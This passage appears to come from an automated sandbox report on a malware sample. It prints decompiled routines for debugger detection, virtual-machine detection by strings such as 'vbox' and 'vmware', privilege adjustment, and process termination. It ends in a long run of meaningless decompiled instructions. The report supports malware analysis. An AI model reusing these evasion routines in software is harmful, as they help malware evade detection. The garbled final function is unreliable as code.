                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: CreateLocalThreadTime
                                                                          • String ID: (ohcx%gmlvl#b|d}m8e|k$2317q129n58non7o3148por15qs741r3$2wrwb=xfpav'g{sm#~gp$4upyl?idzyt9z~`n%|e~$command$p515p225982son69p76q604qp7s97975
                                                                          • API String ID: 3972831565-1317110218
                                                                          • Opcode ID: 5db106fd8fe89164a4683074e62a5a21e238b2b61434d77a43c37ac808585bb6
                                                                          • Instruction ID: 80463a4929d65f88bb62c6d7506587d1b44305c3c58205fc38c9e757c491522e
                                                                          • Opcode Fuzzy Hash: 5db106fd8fe89164a4683074e62a5a21e238b2b61434d77a43c37ac808585bb6
                                                                          • Instruction Fuzzy Hash: F8A1F2B08083199ADB10DF55C5453DEBBF0BB94304F5089AED588A7381D7B89AC9CF9A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Version
                                                                          • String ID: Unk$f2000$f2003$fVISta$fWinS$fXp
                                                                          • API String ID: 1889659487-2404033052
                                                                          • Opcode ID: 6bafecaaa7aee1d569267c96bf0f5a75bd16ea01fa60e304594bc5b44564bdeb
                                                                          • Instruction ID: e8bb7547553301c142e519b247f3baff17d1b23cd464d4725f64abea95698485
                                                                          • Opcode Fuzzy Hash: 6bafecaaa7aee1d569267c96bf0f5a75bd16ea01fa60e304594bc5b44564bdeb
                                                                          • Instruction Fuzzy Hash: DD118334A11718CACF34AA18891939B72B0EB93349F4441FBD88979690C3B98DC9CE1B
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 00404DFA
                                                                          • OpenProcessToken.ADVAPI32 ref: 00404E11
                                                                          • LookupPrivilegeValueA.ADVAPI32 ref: 00404E36
                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00404E89
                                                                          • CloseHandle.KERNEL32 ref: 00404E9E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                          • String ID: (
                                                                          • API String ID: 3038321057-3887548279
                                                                          • Opcode ID: f7190b97f58be1d9d2939eabb058490fe92538849b0e57194ebfcb8a28136c74
                                                                          • Instruction ID: 79319732bb30defa6c9a9f1a6b789a97df9146ac2c859e5e9c71adcb6af8603d
                                                                          • Opcode Fuzzy Hash: f7190b97f58be1d9d2939eabb058490fe92538849b0e57194ebfcb8a28136c74
                                                                          • Instruction Fuzzy Hash: 21119BB4904305DBDB00EF69C18579EBBF4BF44348F00892EE884A7385E779D549CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32strcmp
                                                                          • String ID:
                                                                          • API String ID: 3031566330-0
                                                                          • Opcode ID: 2f2f5fe6758f399921e03acf2909baea6f39b8887e69680e0eb8b402d680a7dd
                                                                          • Instruction ID: 382b25c2ad7d0cef6f391bcc669a6196322adae5fe9b19759f67a92d9b3667d2
                                                                          • Opcode Fuzzy Hash: 2f2f5fe6758f399921e03acf2909baea6f39b8887e69680e0eb8b402d680a7dd
                                                                          • Instruction Fuzzy Hash: 4E1133B18043049AD710BF35D98539EBBF8AF84754F00857EED88A3281E7789958CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Free$AllocateGlobalProcessQuery_lstrcpy
                                                                          • String ID:
                                                                          • API String ID: 335828720-0
                                                                          • Opcode ID: a388a33b90b2a7703f34e2c123a8a93f25413c95038993b571ca2cebfb53ee2e
                                                                          • Instruction ID: 11d18a1c71fde03939184ec7a539e433b17fdc1711bb96236e21141529c11046
                                                                          • Opcode Fuzzy Hash: a388a33b90b2a7703f34e2c123a8a93f25413c95038993b571ca2cebfb53ee2e
                                                                          • Instruction Fuzzy Hash: 5F2148B09043019BDB00EF65C58476BBBF4BF44354F10893EE894AB382E778D958CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: strstr
                                                                          • String ID: qemu$vbox$virtual$vmware
                                                                          • API String ID: 1392478783-2646423876
                                                                          • Opcode ID: c9d4e4dd12de4e295f14a9e62fd40bc20da4a6d1a2aa3fdf2bcdf6fb4d7785e8
                                                                          • Instruction ID: b540962fa618101e36228a8a74583da539d79dad1ba2731ad5b1d3bf9ece319c
                                                                          • Opcode Fuzzy Hash: c9d4e4dd12de4e295f14a9e62fd40bc20da4a6d1a2aa3fdf2bcdf6fb4d7785e8
                                                                          • Instruction Fuzzy Hash: 3DF0A7F4800208CBDB109FA5D8813AF7BA8EB04718F10407ADA54BF7C0D3799D8487D9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,004083E1), ref: 00408158
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: SystemTime
                                                                          • String ID:
                                                                          • API String ID: 2656138-0
                                                                          • Opcode ID: 45992fab59b789b714cf92c72d24a5becac00f776ba7134a840b1a6c57edf9ba
                                                                          • Instruction ID: 62397ccbaa835f3c60518c82b9829302d3b4a44d16c6782a7ba501dc9b29137d
                                                                          • Opcode Fuzzy Hash: 45992fab59b789b714cf92c72d24a5becac00f776ba7134a840b1a6c57edf9ba
                                                                          • Instruction Fuzzy Hash: 58014C60D0452D89DB10EFAEC5451BEB7F2EF48700F408126E890BA288E67C998AD355
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404AB8() {
                                                                          				signed char _t3;
                                                                          
                                                                          				_t3 = 0;
                                                                          				if(IsDebuggerPresent() != 0) {
                                                                          					_t3 = 1;
                                                                          				}
                                                                          				return _t3 & 0x000000ff;
                                                                          			}




                                                                          0x00404abf
                                                                          0x00404ac8
                                                                          0x00404aca
                                                                          0x00404aca
                                                                          0x00404ad4

                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32(004040B2), ref: 00404AC1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: DebuggerPresent
                                                                          • String ID:
                                                                          • API String ID: 1347740429-0
                                                                          • Opcode ID: e7a5aad3decc5595e0085427251ddfb25943da0c25b2f4dd4e54ea83f630c786
                                                                          • Instruction ID: ae9a913412494098cb72223140141d55c0ad5dcb9cb6441feee08d4656a6771e
                                                                          • Opcode Fuzzy Hash: e7a5aad3decc5595e0085427251ddfb25943da0c25b2f4dd4e54ea83f630c786
                                                                          • Instruction Fuzzy Hash: ACC09BE16D52191D790031A73D43463775C446127AB0C1237ED4D593C1E41FF52851BF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 72%
                                                                          			E1000A000() {
                                                                          				signed int* _t108;
                                                                          				intOrPtr* _t121;
                                                                          				intOrPtr* _t122;
                                                                          				intOrPtr* _t123;
                                                                          				signed char _t124;
                                                                          				intOrPtr* _t126;
                                                                          				intOrPtr* _t127;
                                                                          				signed char _t128;
                                                                          				intOrPtr* _t129;
                                                                          				signed int* _t133;
                                                                          				signed char* _t134;
                                                                          				signed char _t136;
                                                                          				signed int _t139;
                                                                          				signed int _t140;
                                                                          				signed char _t142;
                                                                          				signed char _t143;
                                                                          				signed char _t144;
                                                                          				signed char _t146;
                                                                          				void* _t147;
                                                                          				signed char _t148;
                                                                          				signed int _t149;
                                                                          				signed int* _t150;
                                                                          				signed int _t151;
                                                                          				unsigned char* _t152;
                                                                          				signed int _t153;
                                                                          				signed int _t155;
                                                                          				void* _t156;
                                                                          				signed int _t163;
                                                                          				signed int* _t164;
                                                                          				signed int* _t165;
                                                                          				signed int* _t168;
                                                                          				signed int* _t169;
                                                                          				signed int* _t171;
                                                                          				signed int _t172;
                                                                          				signed int* _t176;
                                                                          				signed int _t177;
                                                                          				signed int* _t178;
                                                                          				signed int* _t179;
                                                                          				signed int* _t183;
                                                                          				signed int _t186;
                                                                          				signed int _t188;
                                                                          				signed int _t190;
                                                                          				void* _t191;
                                                                          				signed int _t192;
                                                                          				signed int _t193;
                                                                          				intOrPtr _t195;
                                                                          				void* _t196;
                                                                          				intOrPtr _t200;
                                                                          				signed int* _t201;
                                                                          				signed int* _t202;
                                                                          				intOrPtr _t204;
                                                                          				signed int _t205;
                                                                          				signed int _t206;
                                                                          				signed int _t207;
                                                                          				signed int _t211;
                                                                          				intOrPtr _t218;
                                                                          				intOrPtr _t220;
                                                                          				void* _t223;
                                                                          				signed int _t225;
                                                                          				void* _t226;
                                                                          				signed char _t228;
                                                                          				intOrPtr _t230;
                                                                          				intOrPtr _t231;
                                                                          				intOrPtr _t234;
                                                                          				void* _t250;
                                                                          				signed long long _t260;
                                                                          
                                                                          				_t107 = 0;
                                                                          				 *0 =  *0;
                                                                          				 *_t134 =  *_t134 << 1;
                                                                          				 *_t134 =  *_t134;
                                                                          				_t136 =  &(_t134[2]);
                                                                          				if(_t136 == 0) {
                                                                          					L17:
                                                                          					if(_t168 == 0) {
                                                                          						L38:
                                                                          						asm("arpl [gs:edi+ebp*2+0x72], si");
                                                                          						if(_t177 >= 0) {
                                                                          							L53:
                                                                          							asm("popad");
                                                                          							asm("insb");
                                                                          							_t151 = _t151 + 1;
                                                                          							_t186 = _t151;
                                                                          							L54:
                                                                          							if(_t186 < 0) {
                                                                          								asm("gs outsb");
                                                                          								_t136 = _t136 + 1;
                                                                          								 *_t107 =  *_t107 + _t107;
                                                                          								_t153 = 0xb4000000;
                                                                          								if ( *_t107 >= 0) goto L82;
                                                                          								 *_t136 =  *_t136 + _t107;
                                                                          								_push(_t148);
                                                                          								asm("a16 inc ebx");
                                                                          								asm("insb");
                                                                          								asm("outsd");
                                                                          								if( *_t136 >= 0) {
                                                                          									L113:
                                                                          									_pop(_t150);
                                                                          									L114:
                                                                          									_t153 = _t150[0x18] * 0x62610100;
                                                                          									_t211 = _t153;
                                                                          									asm("outsd");
                                                                          									if(_t211 < 0) {
                                                                          										if(_t226 == 0) {
                                                                          											L160:
                                                                          											if(_t234 >= 0) {
                                                                          												L177:
                                                                          												_t107 = _t107 ^ _t148;
                                                                          												 *(_t148 + 0x10) =  *(_t148 + 0x10) ^ _t107;
                                                                          												asm("adc ebx, [ebp+0x3636361f]");
                                                                          												ds = ss;
                                                                          												 *[ss:eax] =  *[ss:eax] - _t136;
                                                                          												L179:
                                                                          												 *[ss:eax] =  *[ss:eax] - _t136;
                                                                          												 *_t107 =  *_t107 - _t136;
                                                                          												 *_t107 =  *_t107 | _t136;
                                                                          												 *_t107 =  *_t107 | _t136;
                                                                          												 *_t107 =  *_t107 | _t136;
                                                                          												 *_t107 =  *_t107 | _t136;
                                                                          												 *_t107 =  *_t107 | _t136;
                                                                          												asm("adc [0xa1b190b], ecx");
                                                                          												asm("adc [ebx], ecx");
                                                                          												asm("sbb [0x1206180b], edx");
                                                                          												asm("das");
                                                                          												asm("aaa");
                                                                          												asm("adc al, 0x5");
                                                                          												_push(cs);
                                                                          												asm("das");
                                                                          												asm("sbb [ecx], bl");
                                                                          												_push(ss);
                                                                          												_push(ss);
                                                                          												asm("invd");
                                                                          												 *_t107 =  *_t107 | _t136;
                                                                          												asm("wbinvd");
                                                                          												 *_t133 =  *_t133 | _t148;
                                                                          												_t108 = _t107 + 0xb0b0b2b;
                                                                          												_t139 = _t136 |  *0xc050c41 |  *_t133 |  *_t108;
                                                                          												_t149 = _t148 |  *_t133;
                                                                          												 *_t133 =  *_t133 & _t149;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												_t152 = _t151 - 1;
                                                                          												asm("adc [edi], bl");
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												 *_t108 =  *_t108 | _t139;
                                                                          												asm("sbb dh, al");
                                                                          												_t121 =  &(_t108[0xe]);
                                                                          												 *((intOrPtr*)(_t121 + 0x45)) =  *((intOrPtr*)(_t121 + 0x45)) + _t149;
                                                                          												 *_t121 =  *_t121 + _t121;
                                                                          												_t156 = _t155 - 1;
                                                                          												 *_t150 =  *_t150 + _t121;
                                                                          												_t133[0x12fd3f] = _t133 + _t133[0x12fd3f];
                                                                          												 *_t121 =  *_t121 + _t121;
                                                                          												 *_t121 =  *_t121 + _t121;
                                                                          												 *_t121 =  *_t121 + _t121;
                                                                          												_t122 = _t121 + _t121;
                                                                          												 *_t152 =  *_t152 + _t139;
                                                                          												_t140 = _t139 &  *_t133;
                                                                          												 *_t149 =  *_t149 + _t122;
                                                                          												 *_t122 =  *_t122 - _t122;
                                                                          												 *_t122 =  *_t122 + _t122;
                                                                          												 *_t122 =  *_t122 + _t122;
                                                                          												_t123 = _t122 +  *_t122;
                                                                          												 *((intOrPtr*)(_t123 + 0x10)) =  *((intOrPtr*)(_t123 + 0x10)) + _t123;
                                                                          												 *_t123 =  *_t123 + _t123;
                                                                          												 *_t123 =  *_t123 + _t149;
                                                                          												 *_t123 =  *_t123 + _t123;
                                                                          												 *_t123 =  *_t123 + _t123;
                                                                          												 *_t123 =  *_t123 + _t123;
                                                                          												 *_t123 =  *_t123 + _t123;
                                                                          												asm("adc [eax], al");
                                                                          												asm("adc [eax], al");
                                                                          												 *_t123 =  *_t123 + _t123;
                                                                          												_t124 = _t123 +  *_t123;
                                                                          												 *((intOrPtr*)(_t124 + _t124)) =  *((intOrPtr*)(_t124 + _t124)) + _t124;
                                                                          												 *_t124 =  *_t124 + _t124;
                                                                          												 *_t124 =  *_t124 + _t124;
                                                                          												 *_t124 =  *_t124 + _t124;
                                                                          												_t125 = _t124;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *((intOrPtr*)(_t125 + 0x4000000)) =  *((intOrPtr*)(_t125 + 0x4000000)) + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												asm("pcmpeqd mm0, [eax]");
                                                                          												 *_t133 =  *_t133 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												asm("adc [eax], al");
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t149;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												asm("adc [eax], al");
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t149;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												if ( *_t125 < 0) goto L181;
                                                                          												 *((intOrPtr*)(_t125 + 3)) =  *((intOrPtr*)(_t125 + 3)) + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *((intOrPtr*)(_t125 + 0x72c0000)) =  *((intOrPtr*)(_t125 + 0x72c0000)) + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *((intOrPtr*)(_t125 + 0x1dc0000)) =  *((intOrPtr*)(_t125 + 0x1dc0000)) + _t149;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
                                                                          												 *_t125 =  *_t125 + _t125;
